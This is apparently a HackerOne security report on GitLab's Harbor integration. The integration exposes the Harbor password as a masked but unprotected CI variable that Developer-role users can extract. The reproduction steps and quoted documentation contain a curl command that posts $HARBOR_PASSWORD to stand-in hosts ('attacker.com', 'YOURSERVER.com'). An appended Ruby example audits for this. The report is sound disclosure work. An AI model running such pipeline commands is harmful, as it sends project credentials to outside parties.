
Harbor integration passwords are not protected from users with Developer privilege

HackerOne report #1563325 by joaxcar on 2022-05-09, assigned to @nmalcolm:

Report

Summary

Another integration secrets report. This one is not related to my previous ones using URL changes to extract secrets.

It might be that the described scenario is "intentional", but I could not find any mentions of it in the MR for the Harbor integration

!80999 (merged)

When configuring the Harbor integration the maintainer/owner of the project/group enters a username and a password. The password is entered in a "Password" field and hidden with dots. It is also not possible to see the configured password afterwards. The harbor integration comes with this information

After the Harbor integration is activated, global variables ‘HARBOR_USERNAME’, ‘HARBOR_PASSWORD’, ‘HARBOR_URL’ and ‘HARBOR_PROJECT’ will be created for CI/CD use.

And the fields are exposed as variables like this

    def ci_variables
      return [] unless activated?

      [
        { key: 'HARBOR_URL', value: url },
        { key: 'HARBOR_PROJECT', value: project_name },
        { key: 'HARBOR_USERNAME', value: username },
        { key: 'HARBOR_PASSWORD', value: password, public: false, masked: true }
      ]
    end

The password variable is masked in any build logs. Though it is not protected. This allows any user that is allowed to run a CI pipeline in the project/group to extract the password by referencing it in a pipeline yaml file. Info about CI/CD security contains an example to use

    build:
      script:
        - curl --request POST --data "secret_variable=$HARBOR_PASSWORD" "https://attacker.com"

This will post the password to the attacker's site. This is how variables and CI/CD pipelines work in GitLab and there are some warnings sprinkled around in the documentation. There are however no warnings about this in the documentation for the Harbor integration.

As the password is hidden and well protected in the integration settings page (making it impossible to view it there for the creator or other maintainers), it should be stated clearly that the password under normal circumstances is exposed to all users in the project with at least Developer role.

It might be that what is needed is just a documentation update (to H1 triager: in scope) but I think that the integration should default to having the variables made protected with the option to opt out if needed.

Steps to reproduce

Make sure to have a server where you can receive and view requests. I used https://webhook.site during testing

  1. Create two users, victim and attacker
  2. Log in as victim
  3. Create a project project01
  4. Go to https://gitlab.com/GROUPNAME/project01/-/project_members and invite attacker as a Developer to the project
  5. Go to https://gitlab.com/GROUPNAME/project01/-/integrations/harbor/edit
  6. Configure Harbor with any URL, any username and a secret password, click save
  7. Log out and log in with attacker
  8. Go to https://gitlab.com/GROUPNAME/project01/-/branches/new and create a new branch called attack
  9. Go to https://gitlab.com/-/ide/project/GROUPNAME/project01/edit/attack/ this will open the webIDE
  10. Create a file named .gitlab-ci.yml and enter this content

          build:
            script:
              - curl --request POST --data "secret_variable=$HARBOR_PASSWORD" "https://YOURSERVER.com"

  11. Click "Create commit" and then "Commit"
  12. Go to https://gitlab.com/GROUPNAME/project01/-/pipelines and you should see a pipeline running
  13. Go to the attacker server and see that a request has been made exposing the Harbor password

Impact

A user with Developer access to a project can leak the configured Harbor password

What is the current bug behavior?

The password variable is not protected by default and will therefore be exposed in ALL pipelines and branches. There are no warnings that the configured password will be accessible to all developers

What is the expected correct behavior?

The password variable should be protected per default and a warning should be present telling the maintainer that the password can be exposed.
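To make the masked-versus-protected distinction concrete, here is an added Ruby example (not GitLab's code and not part of the report). It models the documented rule that a `protected` variable is only delivered to pipelines on protected refs, applies the report's proposed default (`protected: true` on the masked secret), and audits a constructed `.gitlab-ci.yml` for jobs that reference variables an unprotected-branch pipeline would receive. The `variables_for_job` filter and the variable values are assumptions made for illustration.

```ruby
require 'yaml'

# Constructed copy of the variables the Harbor integration exposes (values are placeholders).
HARBOR_VARIABLES = [
  { key: 'HARBOR_URL', value: 'https://harbor.example.test' },
  { key: 'HARBOR_PROJECT', value: 'demo' },
  { key: 'HARBOR_USERNAME', value: 'ci-bot' },
  { key: 'HARBOR_PASSWORD', value: 'placeholder-secret', public: false, masked: true }
].freeze

# Assumed model of GitLab's rule: a `protected` variable reaches a job only when the
# pipeline runs on a protected branch or tag. `masked` only hides the value in job logs.
def variables_for_job(variables, protected_ref:)
  variables.select { |v| !v[:protected] || protected_ref }
end

# The report's proposed default: every masked (secret) variable is also protected.
def protect_secrets(variables)
  variables.map { |v| v[:masked] ? v.merge(protected: true) : v }
end

# Constructed CI config: the exfiltration job from the report plus a legitimate login job.
CI_YAML = <<~YAML
  build:
    script:
      - curl --request POST --data "secret_variable=$HARBOR_PASSWORD" "https://YOURSERVER.com"
  test:
    script:
      - docker login -u "$HARBOR_USERNAME" "$HARBOR_URL"
YAML

# Audit: for each job, list the integration variables its script references that would
# actually be delivered given the ref's protection state. Returns { job_name => [keys] }.
def jobs_referencing(ci_yaml, variables, protected_ref:)
  visible = variables_for_job(variables, protected_ref: protected_ref).map { |v| v[:key] }
  YAML.safe_load(ci_yaml).each_with_object({}) do |(job, spec), out|
    next unless spec.is_a?(Hash) && spec['script']
    refs = Array(spec['script']).flat_map { |line| line.scan(/\$\{?([A-Z_][A-Z0-9_]*)\}?/).flatten }
    hits = refs & visible
    out[job] = hits unless hits.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "unprotected branch, current default: #{jobs_referencing(CI_YAML, HARBOR_VARIABLES, protected_ref: false)}"
  puts "unprotected branch, protected secret: #{jobs_referencing(CI_YAML, protect_secrets(HARBOR_VARIABLES), protected_ref: false)}"
end
```

With the current default the `build` job on the attacker's unprotected branch still receives `HARBOR_PASSWORD`; with the secret marked protected it does not, while the non-secret variables remain available.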

Output of checks

This bug happens on GitLab.com
